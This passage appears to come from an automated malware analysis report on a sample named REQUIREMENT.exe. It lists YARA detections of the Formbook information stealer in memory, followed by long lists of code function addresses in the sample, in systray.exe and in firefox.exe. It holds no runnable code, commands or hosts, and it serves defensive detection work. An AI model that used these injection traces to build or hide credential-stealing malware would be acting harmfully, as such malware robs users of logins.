Source: 00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_004016F9	1_2_004016F9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_00401746	1_2_00401746
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_0040150A	1_2_0040150A
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B2045	1_2_023B2045
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B76AD	1_2_023B76AD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023BBBCC	1_2_023BBBCC
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6035	1_2_023B6035
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6835	1_2_023B6835
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5E2B	1_2_023B5E2B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6029	1_2_023B6029
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6829	1_2_023B6829
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B681D	1_2_023B681D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B7A08	1_2_023B7A08
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6805	1_2_023B6805
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6479	1_2_023B6479
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6071	1_2_023B6071
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6A75	1_2_023B6A75
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6269	1_2_023B6269
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6A69	1_2_023B6A69
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B646D	1_2_023B646D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6065	1_2_023B6065
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6059	1_2_023B6059
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B625D	1_2_023B625D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6A5D	1_2_023B6A5D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023BA25C	1_2_023BA25C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B9A51	1_2_023B9A51
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6251	1_2_023B6251
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B684C	1_2_023B684C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6041	1_2_023B6041
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6841	1_2_023B6841
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023BA8BF	1_2_023BA8BF
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B58A9	1_2_023B58A9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B64A9	1_2_023B64A9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6AA5	1_2_023B6AA5
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6A99	1_2_023B6A99
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B649D	1_2_023B649D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5A93	1_2_023B5A93
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6491	1_2_023B6491
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B628D	1_2_023B628D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6A8D	1_2_023B6A8D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6281	1_2_023B6281
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6485	1_2_023B6485
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023BAAF9	1_2_023BAAF9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5EFD	1_2_023B5EFD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5EE5	1_2_023B5EE5
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5ED9	1_2_023B5ED9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5ECD	1_2_023B5ECD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5EC3	1_2_023B5EC3
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B673B	1_2_023B673B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B613D	1_2_023B613D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6935	1_2_023B6935
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6929	1_2_023B6929
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5F11	1_2_023B5F11
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5F15	1_2_023B5F15
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6179	1_2_023B6179
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B637D	1_2_023B637D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6769	1_2_023B6769
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B616D	1_2_023B616D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6365	1_2_023B6365
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B635B	1_2_023B635B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6959	1_2_023B6959
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B675D	1_2_023B675D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6751	1_2_023B6751
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6155	1_2_023B6155
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B694D	1_2_023B694D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6941	1_2_023B6941
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6745	1_2_023B6745
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B65BD	1_2_023B65BD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B65B1	1_2_023B65B1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6395	1_2_023B6395
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6389	1_2_023B6389
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B9D8D	1_2_023B9D8D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6185	1_2_023B6185
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6BF5	1_2_023B6BF5
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B65E1	1_2_023B65E1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6BDD	1_2_023B6BDD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6BD1	1_2_023B6BD1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B65D5	1_2_023B65D5
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B65C9	1_2_023B65C9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B73C1	1_2_023B73C1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6BC5	1_2_023B6BC5
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A1EB2	3_2_1E9A1EB2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA59ED2	3_2_1EA59ED2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA51FC6	3_2_1EA51FC6
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5FF63	3_2_1EA5FF63
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1FF40	3_2_1EA1FF40
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA39C98	3_2_1EA39C98
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA27CE8	3_2_1EA27CE8
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BFCE0	3_2_1E9BFCE0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A9DD0	3_2_1E9A9DD0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3FDF4	3_2_1EA3FDF4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5FD27	3_2_1EA5FD27
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA57D4C	3_2_1EA57D4C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5FA89	3_2_1EA5FA89
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BFAA0	3_2_1E9BFAA0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9DDB19	3_2_1E9DDB19
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5FB2E	3_2_1EA5FB2E
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA198B2	3_2_1EA198B2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA578F3	3_2_1EA578F3
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA518DA	3_2_1EA518DA
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3800	3_2_1E9A3800
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA15870	3_2_1EA15870
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5F872	3_2_1EA5F872
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A9870	3_2_1E9A9870
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BB870	3_2_1E9BB870
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9E59C0	3_2_1E9E59C0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9699E8	3_2_1E9699E8
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA136EC	3_2_1EA136EC
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5F6F6	3_2_1EA5F6F6
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3D62C	3_2_1EA3D62C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4D646	3_2_1EA4D646
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E961707	3_2_1E961707
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0D480	3_2_1EA0D480
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA575C6	3_2_1EA575C6
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5F5C9	3_2_1EA5F5C9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98D2EC	3_2_1E98D2EC
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5124C	3_2_1EA5124C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E991380	3_2_1E991380
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5F330	3_2_1EA5F330
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D508C	3_2_1E9D508C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9AB0D0	3_2_1E9AB0D0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA570F1	3_2_1EA570F1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A51C0	3_2_1E9A51C0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BB1E0	3_2_1E9BB1E0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F113	3_2_1E98F113
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3D130	3_2_1EA3D130
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9E717A	3_2_1E9E717A
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA50EAD	3_2_1EA50EAD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E992EE8	3_2_1E992EE8
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C0E50	3_2_1E9C0E50
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9E2E48	3_2_1E9E2E48
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5EFBF	3_2_1EA5EFBF
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A6FE0	3_2_1E9A6FE0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9ACF00	3_2_1E9ACF00
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9B8CDF	3_2_1E9B8CDF
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA6ACEB	3_2_1EA6ACEB
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1EC20	3_2_1EA1EC20
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E990C12	3_2_1E990C12
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9AAC20	3_2_1E9AAC20
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5EC60	3_2_1EA5EC60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA56C69	3_2_1EA56C69
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9B2DB0	3_2_1E9B2DB0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99AD00	3_2_1E99AD00
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A0D69	3_2_1E9A0D69
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5CA13	3_2_1EA5CA13
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5EA5B	3_2_1EA5EA5B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA14BC0	3_2_1EA14BC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A0B10	3_2_1E9A0B10
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9B6882	3_2_1E9B6882
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A28C0	3_2_1E9A28C0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CE810	3_2_1E9CE810
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA40835	3_2_1EA40835
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E986868	3_2_1E986868
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5E9A6	3_2_1EA5E9A6
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99E9A0	3_2_1E99E9A0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A0680	3_2_1E9A0680
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5A6C0	3_2_1EA5A6C0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99C6E0	3_2_1E99C6E0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BC600	3_2_1E9BC600
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C4670	3_2_1E9C4670
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA56757	3_2_1EA56757
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A2760	3_2_1E9A2760
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9AA760	3_2_1E9AA760
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A0445	3_2_1E9A0445
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA6A526	3_2_1EA6A526
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E962245	3_2_1E962245
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9AE310	3_2_1E9AE310
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9900A0	3_2_1E9900A0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4E076	3_2_1EA4E076
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049A0445	13_2_049A0445
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A6A526	13_2_04A6A526
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049A0680	13_2_049A0680
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A5A6C0	13_2_04A5A6C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_0499C6E0	13_2_0499C6E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049BC600	13_2_049BC600
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049C4670	13_2_049C4670
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A56757	13_2_04A56757
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049A2760	13_2_049A2760
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049AA760	13_2_049AA760
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049900A0	13_2_049900A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A4E076	13_2_04A4E076
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049AE310	13_2_049AE310
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049B8CDF	13_2_049B8CDF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A6ACEB	13_2_04A6ACEB
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A1EC20	13_2_04A1EC20
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04990C12	13_2_04990C12
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049AAC20	13_2_049AAC20
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A5EC60	13_2_04A5EC60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A56C69	13_2_04A56C69
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049B2DB0	13_2_049B2DB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_0499AD00	13_2_0499AD00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049A0D69	13_2_049A0D69
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A50EAD	13_2_04A50EAD
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04992EE8	13_2_04992EE8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049C0E50	13_2_049C0E50
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049E2E48	13_2_049E2E48
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A5EFBF	13_2_04A5EFBF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049A6FE0	13_2_049A6FE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049ACF00	13_2_049ACF00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049B6882	13_2_049B6882
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049A28C0	13_2_049A28C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049CE810	13_2_049CE810
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A40835	13_2_04A40835
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04986868	13_2_04986868
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A5E9A6	13_2_04A5E9A6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_0499E9A0	13_2_0499E9A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A5CA13	13_2_04A5CA13
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A5EA5B	13_2_04A5EA5B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A14BC0	13_2_04A14BC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049A0B10	13_2_049A0B10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A0D480	13_2_04A0D480
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A575C6	13_2_04A575C6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A5F5C9	13_2_04A5F5C9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A136EC	13_2_04A136EC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A5F6F6	13_2_04A5F6F6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A3D62C	13_2_04A3D62C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A4D646	13_2_04A4D646
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D508C	13_2_049D508C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049AB0D0	13_2_049AB0D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A570F1	13_2_04A570F1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049A51C0	13_2_049A51C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049BB1E0	13_2_049BB1E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_0498F113	13_2_0498F113
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A3D130	13_2_04A3D130
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049E717A	13_2_049E717A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_0498D2EC	13_2_0498D2EC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A5124C	13_2_04A5124C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04991380	13_2_04991380
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A5F330	13_2_04A5F330
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A39C98	13_2_04A39C98
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A27CE8	13_2_04A27CE8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049BFCE0	13_2_049BFCE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049A3C60	13_2_049A3C60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049A9DD0	13_2_049A9DD0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A3FDF4	13_2_04A3FDF4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A5FD27	13_2_04A5FD27
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A57D4C	13_2_04A57D4C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049A1EB2	13_2_049A1EB2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A59ED2	13_2_04A59ED2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A51FC6	13_2_04A51FC6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A5FF63	13_2_04A5FF63
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A1FF40	13_2_04A1FF40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A198B2	13_2_04A198B2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A578F3	13_2_04A578F3
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A518DA	13_2_04A518DA
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049A3800	13_2_049A3800
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A15870	13_2_04A15870
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A5F872	13_2_04A5F872
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049A9870	13_2_049A9870
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049BB870	13_2_049BB870
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049E59C0	13_2_049E59C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A5FA89	13_2_04A5FA89
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049BFAA0	13_2_049BFAA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A31B80	13_2_04A31B80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049DDB19	13_2_049DDB19
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_04A5FB2E	13_2_04A5FB2E
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027ECB87	13_2_027ECB87
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027EC925	13_2_027EC925
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027EB9F9	13_2_027EB9F9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027ECFB7	13_2_027ECFB7
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027D2FB0	13_2_027D2FB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027D8C70	13_2_027D8C70
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027D8C6B	13_2_027D8C6B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027D2D90	13_2_027D2D90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027D2D87	13_2_027D2D87
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 21_2_000001E92741ED02	21_2_000001E92741ED02
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 21_2_000001E9274178FB	21_2_000001E9274178FB
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 21_2_000001E92741A2FF	21_2_000001E92741A2FF
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 21_2_000001E927417902	21_2_000001E927417902
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 21_2_000001E92741A302	21_2_000001E92741A302
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 21_2_000001E92741DF06	21_2_000001E92741DF06
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 21_2_000001E92741C7B2	21_2_000001E92741C7B2
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 21_2_000001E927418359	21_2_000001E927418359
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 21_2_000001E927418362	21_2_000001E927418362
